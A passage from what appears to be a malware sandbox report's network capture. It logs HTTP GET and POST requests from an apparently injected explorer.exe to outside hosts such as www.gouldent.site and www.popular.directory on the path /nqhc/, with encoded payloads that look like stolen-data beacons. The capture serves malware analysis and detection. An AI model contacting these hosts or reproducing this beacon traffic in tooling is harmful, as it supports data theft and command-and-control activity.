58 75 44 76 77 74 55 73 4d 66 48 66 6f 44 78 4d 33 4f 32 6b 68 78 44 35 6f 58 43 76 30 59 45 32 4f 71 31 41 76 65 77 4b 44 71 39 67 41 69 76 78 32 31 71 76 35 75 6b 59 42 65 65 5f 76 52 48 56 6c 62 37 56 68 6e 65 76 4f 31 71 68 46 4e 5a 78 41 4e 78 43 48 4a 48 69 66 59 32 69 31 75 6d 6f 79 73 30 71 4f 70 39 53 32 47 38 72 78 32 4d 79 6b 4c 65 70 68 6b 78 4d 45 64 7e 30 78 31 77 6e 74 33 41 36 31 34 53 33 64 72 67 52 78 64 4d 54 69 69 36 63 61 5f 35 55 52 76 28 41 50 57 4a 49 30 54 55 59 66 56 31 69 49 63 30 57 7e 37 55 50 78 74 58 2d 71 58 35 38 54 59 76 4c 45 51 6a 45 34 62 76 66 50 51 52 51 4c 76 7e 49 45 55 67 55 53 7a 35 4b 56 62 41 76 72 73 32 75 62 72 4f 39 68 57 6c 64 6a 4d 4e 6c 41 7a 69 53 41 5a 7a 30 6e 63 71 33 4b 69 56 4e 48 6c 54 38 76 36 61 65 4c 4f 4d 56 6b 34 4f 71 53 6e 4b 65 37 5a 35 5a 6a 71 28 6b 51 71 42 46 64 39 6c 44 41 49 68 44 33 53 43 59 76 5f 52 45 74 57 4f 4a 7a 37 28 68 39 79 4a 6b 55 67 43 7a 30 47 36 66 37 53 41 68 7a 6e 62 45 39 77 72 35 65 2d 41 4e 6a 32 39 4d 50 4f 45 4e 69 6b 32 4c 42 66 32 7a 53 70 55 65 33 39 79 78 68 6d 65 45 30 76 72 47 6f 6b 74 75 57 30 61 57 49 66 55 31 4d 67 5a 39 4a 34 74 50 31 50 43 37 7e 42 55 6a 4b 36 63 52 75 34 47 68 48 47 46 34 65 52 30 33 5a 4e 59 61 77 6f 67 35 50 41 71 68 4e 67 6a 4e 4a 31 56 79 58 73 31 6a 4f 59 68 4a 33 6c 35 54 34 4b 78 53 76 48 46 48 7a 42 67 61 6a 49 66 48 47 42 43 66 31 6f 75 49 48 7a 50 49 7a 45 77 4e 63 6a 43 66 56 4a 46 46 77 44 49 54 5a 2d 4a 6b 57 52 4b 77 7e 56 77 6b 47 55 57 31 78 4f 65 55 53 2d 37 44 6c 33 47 72 39 33 68 44 49 5a 42 2d 37 68 6a 62 50 44 41 68 6f 63 72 6b 57 55 47 67 5a 38 33 68 33 71 6d 70 6d 45 66 59 44 37 6f 6a 71 41 41 63 77 45 61 59 68 4e 58 6f 62 64 44 64 6d 74 77 69 76 33 73 4d 77 79 48 31 62 63 63 6f 34 45 63 62 39 72 4c 48 69 53 48 48 78 6d 6a 32 6d 72 67 59 32 4e 30 75 54 51 73 42 53 64 72 4c 6c 57 65 38 42 4c 59 33 75 66 7a 4b 61 36 46 5a 64 6b 77 51 62 59 4d 53 48 6e 31 6c 71 4b 55 6e 6d 6f 38 4d 35 68 52 71 77 4c 63 4a 36 34 64 67 53 7a 33 33 6f 77 45 77 4f 64 64 51 68 42 4c 62 49 61 50 43 56 4f 56 54 37
                                                                                                                                                                          Data Ascii: 7nWHV=4aNeThNKxkEEw20XVekfhBPRZW8A0RSIisiUdFuPkB8zL8UQk0xOxnLslI(yvvbr2_fJ3drQ9OkoIzEQ3KyP4dwo7nsnQ1AySTRawIg1lUWARX122ytfT2irTM3c6HNzQctoHKhHER8XzfDoD1bh1b8Vo0Nt4CE6mpgeMQaFKp8Qvjyp~M6ipGYxQCX4zh9HMdvuW3WPHRtgNxO6kC8f48SiyYNgWLuIZATCeIAK4BmhaZvyMHJ0ec4QGzBvj7wUtyABxPZaz0yqELS7TU2VHwWqa5h7s7xkkauf24J5g-RzukJOORNH079DBYEH0zv3JUs96F1Usd2_Gna9usKqlOBMlz2qTgyWHc7JBQF_i4FcJO6qpZsFrPibWR~-eUuucwOb8ZyLCktz0Nmup2ag2f4ts6LzEAiEq5CVpasAXw91uW(M(vxgf75nSdmo1k8uIXuHZAG4k3iBodAPiHAyysXVbSNaJ2cSTMzUAUIGF0bCspQU2mIkvwhr4GvvHRjq3uoRmbSMATDqxaxVKavbn24-YR9RIvh_(jACz9rlmjRSbapTQQBNwvDyz3m5~FEMo1ea5YvPsJKNLa0PdRhzReirci7NErt0zAr-qjmudE3LCfBACRSOSswMU2YaRqZe3eB4n4ln1f3fC_rtD6LK(tuoB_0aXuDvwtUsMfHfoDxM3O2khxD5oXCv0YE2Oq1AvewKDq9gAivx21qv5ukYBee_vRHVlb7VhnevO1qhFNZxANxCHJHifY2i1umoys0qOp9S2G8rx2MykLephkxMEd~0x1wnt3A614S3drgRxdMTii6ca_5URv(APWJI0TUYfV1iIc0W~7UPxtX-qX58TYvLEQjE4bvfPQRQLv~IEUgUSz5KVbAvrs2ubrO9hWldjMNlAziSAZz0ncq3KiVNHlT8v6aeLOMVk4OqSnKe7Z5Zjq(kQqBFd9lDAIhD3SCYv_REtWOJz7(h9yJkUgCz0G6f7SAhznbE9wr5e-ANj29MPOENik2LBf2zSpUe39yxhmeE0vrGoktuW0aWIfU1MgZ9J4tP1PC7~BUjK6cRu4GhHGF4eR03ZNYawog5PAqhNgjNJ1VyXs1jOYhJ3l5T4KxSvHFHzBgajIfHGBCf1ouIHzPIzEwNcjCfVJFFwDITZ-JkWRKw~VwkGUW1xOeUS-7Dl3Gr93hDIZB-7hjbPDAhocrkWUGgZ83h3qmpmEfYD7ojqAAcwEaYhNXobdDdmtwiv3sMwyH1bcco4Ecb9rLHiSHHxmj2mrgY2N0uTQsBSdrLlWe8BLY3ufzKa6FZdkwQbYMSHn1lqKUnmo8M5hRqwLcJ64dgSz33owEwOddQhBLbIaPCVOVT7DVadkeEaLtw9rs6pWsasZ8rqCmu35Okbs3Pa63SkOA6SS5_O_WryzAkw7LD8_G2~o~UNju48aOXVgkVQLTTfowIangsu1ljWsVd8-OpOgA1l3iIn3QU9zl1CHva8kZoAB5rkpoMYqBqmiCM2zdkT7OdRwP3di6I8V~AkjwoRtIQMz2fO8oHkWZnXrKSowikA3~U~0IpKEADpcdrdo6o0Uz7Dcsmvoe0PvkCIC9ISoNRfjzIY0f30WCMjzz99LStqdYG4-wLXPLrjioO93f6r-uzaYrl4JWXhPol00L-lOD0wsniNgV8GTtwHUeaZopLQvr414ujYBNmUphoq6NIEm7Fbv8DUPLpu5NTW_Y71KkyjLYEEPiy1JhiEOR8cI9Kv8IazTcXHmOEVtIGFKrYZY6v8FvgIWVFIYL53_mChxK5QfCv6Cwt5F0WGrUif2SVdpeCbPsu4j3Dmzz82mvmZgThORs64lcvWUpb(v7fEG12r-q5xekN0AGedx(rD_vd9QPafkemONulqcRrFWgbiLFJ8g80ZMVLWsg_(hkavUASzhjtkd8C9qEfyS(uWGrKqM24PA9oVmLZu4nv9z710PbYPrkt6SpaXjQ6cfSGWBTT2nKfR7hr3laXee2vCOn9ZePUasQscYurZWxG5PszfZVgTlU19N(vf5x5k-5mVaavLu46CHAjf4iFXtFuKoF-MExV0DZ3FRbjOaon6EcXG5YQM4LxpHIuXdsLPBly7tVmlKGXaVKgftlWWOSTQYihWml95YF-0_ZUB7chJg7KTmzfkuIXPhDxTPxBmIrV2ZnFOmFkszmw5CU1LY0YYaY27MVo0zd7P9zN6Bj8~CCaPOtLPRMVSH54uIxXYCMr5W1wB-vD8eK2i1UOfxhq7C6plvi1IrYBh4y1iRJU9YprAGpTmJSIuOkNS2c05b8PqpfemvqbGVcdKLoW3MldLZc3aOE2Iv9EEtEm8oTfjkt3AuDjygINjEO6vkryLn(4qPGuROESrCyi0bLWHuLNcT7R9lxVxVCw(B7sIlNADVbCdiumUEHvtmLgqCsKKaEcfTPXIl~SUnZnBXtPCYEFT4yoFNWRFxhALytCyD2dmidLUj5A6gAR7XAJvJsVx912ECq_lXJSkluGed56TqTHqZU0zwLpyk1uVySIdgHOFTOvKNYd7EqmuyGskErbcKbIL9qeTLGBfpSA3DrYtRrYxIbwb0LcLBItQzU9sNUGvCxWHYMJq8BPf5BdKn9aIewYu33qN19NnI7PavKNHw9UNbqL5Vd5C4fhs6k43q2-qz9296gC4TvKYuC-Scgmu0K8CfhKIw2Kz9y0tnXON87sh1P7(JBOeqWhywHaHtj0LepkL07soWdhSBGfNH4RJdG211gVrJIJLAph8W6WCqCTjLHyfEhAIRshcWtt32W9H94xFwLK6L51LS0kSnKf6Mcop4oym3XClYE6SZI3A4tWfkOTZFjmG-Iyz00Ogs0V0t5EfaT1XYg1VnZ5SEUtk6CaYV3oG2tHCcuuolHxLUGjeFrSo-0oHDwrpPmc2cJOBKqWfvCIPDR4nt(66NxYnINfL1rnAAoH0aJkAxOJG_~cADF69LZvnYkTRHDoir5q0N6KRswtv7zkY0hyzqWAt6VtddxIFwmTLp7h5CCWKTS1tOF-~NMzvOPwFgSQD6~nvYAtoxAB0rd6GM1pgfVB(gNrbW9dC7hEGxIByQoaAUtCvBvOlEDRBC(bKWks~umS4yOEjnhGr8f1Du4AvDw3CgIGCManj3N5E-9lUJf-QPk4dHfnbfEFyFV2uXK34c9QmBM5opuA2WtlsyyZLGqtKxjm~Bx1DZ4FbKvUbANGoFNPMpnZBMa_rU7229IwCLvrkYrvrICzwUqUObRxCm0JUwZOLMopFDLsf-U8XG2pYxT1tdHz8f2Fnt(pNlbSV9s-QQRMVz3IDX3PvysAjGYna4aSZtltDTlsV-ygBScBjKFn9gEQnuDyhyiKXXDoxcuIXtc6j_sH6rHowZsQIFbjhGbhLT6pYMY3CuoGyF667ie1Vpa8OAkcUs4AiZz7HZYFq5xLUcFs0mleM15TpIw0mXbNAAWVMxtvOh9Q9bfmaSqjcGeezYKPsQ1ZLQzPphnA4yvxRe99ejKJg7g3nAHhMfP4rDAXFAQRgvA0PtWiFDiM12F4l9sRW4I54LmGqRavtXz8beI11Dw9jUZhsrgzKaziK1EIpBrJLqCIFQvbHXOrnbYLSkQrQbwn4aIwFcDqN_~NgPVyn8bKs9PKv90LyIgKD5ItOInaBVw_tyzIfOttqOl8sR7yI5C8dzWK~F~U4oyKZE9KFk87dkOeX7R2yEEv32vB83fgCt2UFWIHgmfL6S0vN4gWKzPSs0mvTYUDDl3H7lkUZF02nt6xgfyK9bTZxvnbi_pVFEddpw13ubmgiNHIXRIvHYOa5SKXs6sdBMrNviNBLVf5UrI6hcDXpFA_VYwvHFjcqMlLW9I3vvcTx8GLh5kPAs3Zfhw97n4NAgt7MHJu3gQJqmknwAJTiI~1v_m0td(RD7ZfZkS6mBTfcx9Jg7NYlHD8mH~Uv4PaIxg6EpGKWe6yxUIR74qwwZtENiASN4U1UcQt(kdPOeQ3XDU3E3QsCCOifOwyFwH1foBQKdPh7t7MPN9ezWgiH6ByxbDxlBwnFWD0KeB6bjPZWOfcDUcAbbNkwDrJAvo6NZFPc7uNYf3iFs~Zcwt9
                                                                                                                                                                          Dec 5, 2022 15:20:02.660890102 CET12793OUTData Raw: 32 42 68 46 5a 6a 55 6a 4d 79 61 64 4f 44 64 36 34 46 41 6a 39 77 72 4f 77 64 48 42 51 64 42 28 6f 4f 63 4d 38 63 77 5a 6e 36 68 46 6d 65 50 55 61 7a 7a 4b 36 70 6a 39 38 6c 38 47 50 34 6a 49 54 4f 6a 4b 46 73 56 73 70 5a 72 57 48 5a 72 76 4a 32
                                                                                                                                                                          Data Ascii: 2BhFZjUjMyadODd64FAj9wrOwdHBQdB(oOcM8cwZn6hFmePUazzK6pj98l8GP4jITOjKFsVspZrWHZrvJ2i2g0h~fwvZ385l3tQR-GNY2vToFREM7XwNdt9nN3KUSljCQNPAzPkkMPy2lPRl9xqWbeJK6Me53kjrLD5~gooKUq0JOMaIxdn53ARi2NIeZAcn_(pXrfBbAma8yllfH1z3clj2p3tLKAsxHa9DeyPSp5Ww-3mdsgr
                                                                                                                                                                          Dec 5, 2022 15:20:02.819624901 CET12794OUTData Raw: 61 74 61 42 50 78 59 32 79 30 4d 78 49 45 52 44 65 41 59 52 32 78 32 52 5f 38 74 75 35 70 78 76 59 58 6b 6d 73 68 4a 66 72 52 71 68 41 31 53 4c 66 71 36 43 37 4d 41 37 64 62 64 45 42 58 5f 50 43 37 69 63 72 36 33 72 61 4c 65 63 4c 36 53 53 59 78
                                                                                                                                                                          Data Ascii: ataBPxY2y0MxIERDeAYR2x2R_8tu5pxvYXkmshJfrRqhA1SLfq6C7MA7dbdEBX_PC7icr63raLecL6SSYxS5Hqlci95Gn~jLWxtAE(EMHq1M_HR881kl2e3BVxwR2uZUhHSndGp1AYKQ0QEGqtJokCudNh7~np-rR6kHkG_asDF~fr3dhHG5OfpOZo5sIX530H5zYOraBPL6ks0vHDofO6axH36LCdQKpUfcGNQnW~Teb9_8zX6
                                                                                                                                                                          Dec 5, 2022 15:20:02.819669008 CET12798OUTData Raw: 4d 73 77 77 72 39 79 38 7a 54 62 42 43 39 4a 74 41 70 65 33 51 68 65 72 4b 32 34 69 66 45 48 31 4a 5a 4f 30 58 51 34 42 50 78 4e 4c 5f 35 6f 67 69 58 5f 4d 49 58 5a 42 69 41 65 76 75 32 50 63 65 77 37 49 34 49 66 33 6c 61 46 5a 59 62 38 6e 6b 79
                                                                                                                                                                          Data Ascii: Mswwr9y8zTbBC9JtApe3QherK24ifEH1JZO0XQ4BPxNL_5ogiX_MIXZBiAevu2Pcew7I4If3laFZYb8nky3nBOTw2~3skLFDeXlTNdMZGLet169CghV19cw9g~JI30NLZQHTErRYzFO(r4gkZZz~K4_y1LKcwO8kn3I2_WRkT0j93hRmFCTteE2keqh~6nnaCYQLRd_MfQhuaLk5_uy8isO4fbSiNhV8_iBK6nWPwP_eixEkHJt
                                                                                                                                                                          Dec 5, 2022 15:20:02.819916010 CET12806OUTData Raw: 4b 34 6d 32 70 61 6b 7a 71 4b 68 71 52 62 52 4f 6e 7e 58 30 33 69 75 63 46 44 6a 45 6d 68 66 51 71 7a 56 6c 66 33 34 7e 44 71 4a 66 6c 69 2d 6e 61 77 4b 59 50 28 69 38 6e 64 66 4b 33 4e 7a 79 6c 46 67 76 49 71 31 7a 30 41 57 77 61 66 59 72 51 71
                                                                                                                                                                          Data Ascii: K4m2pakzqKhqRbROn~X03iucFDjEmhfQqzVlf34~DqJfli-nawKYP(i8ndfK3NzylFgvIq1z0AWwafYrQqzowOj2ZVhslusAfh6Bf914jpbT43H5B9I2ruTa1zk2f6UZG1a70aYGamfQrzJyKeDKZD5gQS6~IRZWdGtQZ8buQIoijLSraq6~iJtfqw_ac6ux6maKgyvDFc44611uw8j68UuVYjS4bhNvSjiSTu6JLbZZ9bwoNJ9
                                                                                                                                                                          Dec 5, 2022 15:20:02.820058107 CET12808OUTData Raw: 65 4e 31 36 32 30 4e 66 62 37 37 7e 4a 54 6e 55 53 4d 31 66 78 59 58 54 70 4a 5f 72 66 79 32 4b 76 71 55 6c 78 6a 41 6e 68 5a 55 6b 4c 67 6d 6b 53 4b 69 65 6a 51 4c 62 6f 42 36 63 5f 62 70 68 61 4b 7a 4d 53 4e 4c 59 56 42 64 58 2d 42 6b 28 4a 7e
                                                                                                                                                                          Data Ascii: eN1620Nfb77~JTnUSM1fxYXTpJ_rfy2KvqUlxjAnhZUkLgmkSKiejQLboB6c_bphaKzMSNLYVBdX-Bk(J~do5Zp(w1UZVC7SmlY6mltwq9J1tTjHfeA~yIk7gO-Gw4vHTp-dIjhJ74L~LVTD5UAFXYNP5MVnL2p4UHc9cOFiUBSwdF1LsRcHZkJeAUIj9~nmi~VzpqPCFznUSvduVtTqHB-PuTGSafC3qfxn2Z2agJbf6nG~b~t
                                                                                                                                                                          Dec 5, 2022 15:20:02.820228100 CET12813OUTData Raw: 4f 57 62 52 35 50 4d 54 43 51 51 70 31 6c 70 76 51 4c 69 61 34 4d 50 42 4f 7a 43 69 4f 49 76 30 32 74 34 77 2d 77 5a 70 74 6f 70 6d 32 4e 68 58 55 79 48 66 59 76 2d 30 6e 75 6c 67 48 52 30 66 5f 5a 75 28 55 58 52 41 67 59 33 51 6e 58 6b 73 32 6e
                                                                                                                                                                          Data Ascii: OWbR5PMTCQQp1lpvQLia4MPBOzCiOIv02t4w-wZptopm2NhXUyHfYv-0nulgHR0f_Zu(UXRAgY3QnXks2nqqH~q2MSR8Oro1IsYchFx7zgJZxJjGIftV-JxSW4K2itL1Lp6ccvxfzHc9PF98pEqW1AuZn5wPdkVKl8ARgwlt36OFDtCWtU-Rtlqqc8DthYA1zIgYFiOtftZpX63cVlt3a7d4SOOWhUCvpS5ChlBWI7QvuMpQEQX
                                                                                                                                                                          Dec 5, 2022 15:20:02.820400000 CET12819OUTData Raw: 48 6a 4f 7a 4b 61 79 66 71 51 35 53 30 75 58 5a 4c 6a 4b 51 67 35 38 67 37 44 39 75 70 37 57 45 54 33 79 44 57 38 42 4f 51 4d 44 39 4a 64 73 44 4d 70 78 4b 6e 7e 61 65 48 33 39 78 76 73 6b 6c 55 70 4d 37 56 75 5f 4f 45 36 61 78 2d 6c 71 48 62 78
                                                                                                                                                                          Data Ascii: HjOzKayfqQ5S0uXZLjKQg58g7D9up7WET3yDW8BOQMD9JdsDMpxKn~aeH39xvsklUpM7Vu_OE6ax-lqHbxTuKhd7L(c8rxUxIfKuM8E2NYcJ8~sTtcHKINU6R9wXbdqu7TSH9t0h_VwCCDXmgR5BYQg3thmF9xae4rCq4Alf-Wv2FKrW3tn6HWgoKjybfUYBpXNLnapJzKEzhcCrI~lCH~VpvMyc2XusRxeFP~xLx8B8wu3Ib(0
                                                                                                                                                                          Dec 5, 2022 15:20:02.980968952 CET12820OUTData Raw: 5f 71 6b 28 74 6f 6e 31 42 64 4c 43 78 51 6d 6e 4f 61 34 6d 2d 74 4d 66 31 6c 6a 6f 6f 46 77 68 51 6a 74 4f 4b 37 39 4a 30 51 61 36 48 4c 4c 64 42 54 6d 36 5a 6f 70 66 33 64 31 65 51 71 6b 68 57 4e 44 59 54 4f 48 54 67 49 2d 28 62 44 74 4f 34 71
                                                                                                                                                                          Data Ascii: _qk(ton1BdLCxQmnOa4m-tMf1ljooFwhQjtOK79J0Qa6HLLdBTm6Zopf3d1eQqkhWNDYTOHTgI-(bDtO4qf1kO1DchNfVK2lyL1lVeLTALQqaRuvZ57fLxMzy0aawAlX1Twm4otE6mncRFgGKWlJ_QoumHqMbhBY6iHuSRXlvqp7XQ4lNMr3GR653uB(3uDjz1qafu144Ja4Aplx9BeTKYcA8GF(RWqchgVKKL-EIOlQXc47fsn
                                                                                                                                                                          Dec 5, 2022 15:20:02.980968952 CET12821OUTData Raw: 61 74 61 42 50 78 59 32 79 30 4d 78 49 45 52 44 65 41 59 52 32 78 32 52 5f 38 74 75 35 70 78 76 59 58 6b 6d 73 68 4a 66 72 52 71 68 41 31 53 4c 66 71 36 43 37 4d 41 37 64 62 64 45 42 58 5f 50 43 37 69 63 72 36 33 72 61 4c 65 63 4c 36 53 53 59 78
                                                                                                                                                                          Data Ascii: ataBPxY2y0MxIERDeAYR2x2R_8tu5pxvYXkmshJfrRqhA1SLfq6C7MA7dbdEBX_PC7icr63raLecL6SSYxS5Hqlci95Gn~jLWxtAE(EMHq1M_HR881kl2e3BVxwR2uZUhHSndGp1AYKQ0QEGqtJokCudNh7~np-rR6kHkG_asDF~fr3dhHG5OfpOZo5sIX530H5zYOraBPL6ks0vHDofO6axH36LCdQKpUfcGNQnW~Teb9_8zX6
                                                                                                                                                                          Dec 5, 2022 15:20:02.980969906 CET12823OUTData Raw: 44 38 39 6d 45 52 6a 47 71 75 36 7a 67 33 59 77 32 31 74 54 53 37 39 72 6d 74 38 41 44 32 39 44 62 35 50 51 76 41 77 53 53 54 36 53 39 6e 44 7a 69 46 69 4a 35 50 41 47 6a 58 66 35 4d 53 35 4d 4c 76 49 46 62 54 74 62 38 70 2d 41 6f 47 47 46 45 44
                                                                                                                                                                          Data Ascii: D89mERjGqu6zg3Yw21tTS79rmt8AD29Db5PQvAwSST6S9nDziFiJ5PAGjXf5MS5MLvIFbTtb8p-AoGGFEDTyoBPNi97ibNthJbUw6AH3WeyQ3alNeyOuYx1t3eF1IkMaeo93CEf7yzMjwNp5QN_jrCmKzKP9jwGAtHUT40Z(aGa9SjegT7Kn17kWPfA8LPHsXp99eUJ2D19YB1uqiziwzGlPh1mxtxYj6sOGgrA(3StbldTm7Yg
                                                                                                                                                                          Dec 5, 2022 15:20:04.069257975 CET12837INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:02 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          87192.168.11.204994466.29.151.4080C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:04.841336966 CET12837OUTGET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.gouldent.site
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:20:05.151922941 CET12838INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:20:04 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 570
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          88192.168.11.204994564.190.63.11180C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:20:10.215637922 CET12839OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.popular.directory
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.popular.directory
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.popular.directory/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
